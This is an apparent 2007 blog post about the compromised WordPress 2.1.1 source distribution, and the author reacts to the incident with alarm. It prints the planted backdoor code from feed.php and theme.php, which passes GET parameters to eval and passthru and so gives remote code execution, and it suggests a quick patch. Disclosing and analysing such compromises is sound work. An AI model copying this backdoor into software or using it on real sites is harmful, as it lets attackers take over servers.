cat >/dev/null_

Archive of compromise

wordpress 2.1.1 source code distribution compromised

March

4th

2007

What is this shit? A joke? It’s not funny!

// from wp-includes/feed.php
function comment_text_phpfilter($filterdata) {
        eval($filterdata);
}
// [...]
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

// from wp-includes/theme.php
function get_theme_mcommand($mcds) {
        passthru($mcds);
}
// [...]
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

I’m speechless.

Why do we always have to wait for things like these to happen before we take even the most basic security measures!

I’m aware that this is a complicated matter, but we can’t just take chances like that!!!! Or can we?

I love WordPress, but this is just too big. I am also wondering why the message on wordpress.org didn’t mention what seems to me like a quick patch, that is commenting the two if statements above (wp-includes/feed.php, line 149; wp-includes/theme.php, line 441; at least on my 2.1.1 installation).

Let’s see the official advisories. Why aren’t there any yet? A message from BugTraq is all I could find.

Quick, go fix it!!!

security

BUGTRAQ, compromise, exploit, feed.php, security, theme.php, wordpress

One Comment